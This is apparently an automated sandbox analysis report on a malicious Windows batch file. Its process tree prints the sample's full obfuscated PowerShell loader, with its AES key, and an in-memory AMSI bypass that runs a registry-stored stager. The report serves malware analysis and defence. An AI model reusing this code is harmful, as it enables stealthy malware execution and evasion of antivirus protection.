Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.cmd

Overview

General Information

Sample name:1.cmd
Analysis ID:1525473
MD5:19fc666f7494d78a55d6b50a0252c214
SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Execute Batch Script
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 2120 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 5924 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 5968 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3808 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 2596 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 1284 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 732 cmdline: C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 2088 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5216 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 1712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 4192 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 4336 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 6808 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 6856 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 4284 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 4828 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 412 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 3904 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 4556 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 2852 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 3804 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 6048 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 2844 cmdline: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • WMIADAP.exe (PID: 5500 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1284INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2e561a:$b2: ::FromBase64String(
  • 0x2e5678:$b2: ::FromBase64String(
  • 0x35e0c7:$b2: ::FromBase64String(
  • 0x35f549:$b2: ::FromBase64String(
  • 0x379fe1:$b2: ::FromBase64String(
  • 0x37a03f:$b2: ::FromBase64String(
  • 0x37aad2:$b2: ::FromBase64String(
  • 0x37ab30:$b2: ::FromBase64String(
  • 0x4048b9:$b2: ::FromBase64String(
  • 0x404917:$b2: ::FromBase64String(
  • 0x2de4f2:$s1: -join
  • 0x46128e:$s1: -join
  • 0x46bc12:$s1: -join
  • 0x4784b7:$s1: -join
  • 0x48558c:$s1: -join
  • 0x48895e:$s1: -join
  • 0x489010:$s1: -join
  • 0x48ab01:$s1: -join
  • 0x48cd07:$s1: -join
  • 0x48d52e:$s1: -join
  • 0x48dd9e:$s1: -join
Process Memory Space: powershell.exe PID: 4828INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xf9c2:$b2: ::FromBase64String(
  • 0xfa20:$b2: ::FromBase64String(
  • 0x5d86d:$b2: ::FromBase64String(
  • 0x835c3:$b2: ::FromBase64String(
  • 0xcf15e:$b2: ::FromBase64String(
  • 0xcf1bc:$b2: ::FromBase64String(
  • 0x8bc3:$s1: -join
  • 0x955f1:$s1: -join
  • 0x97888:$s1: -join
  • 0x1eef:$s3: Reverse
  • 0xd5b5a:$s3: Reverse
  • 0x35f8:$s4: +=
  • 0x369a:$s4: +=
  • 0x6de2:$s4: +=
  • 0x8898:$s4: +=
  • 0x8aae:$s4: +=
  • 0x8ba5:$s4: +=
  • 0x91858:$s4: +=
  • 0x91877:$s4: +=
  • 0x918b2:$s4: +=
  • 0x918cf:$s4: +=

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function 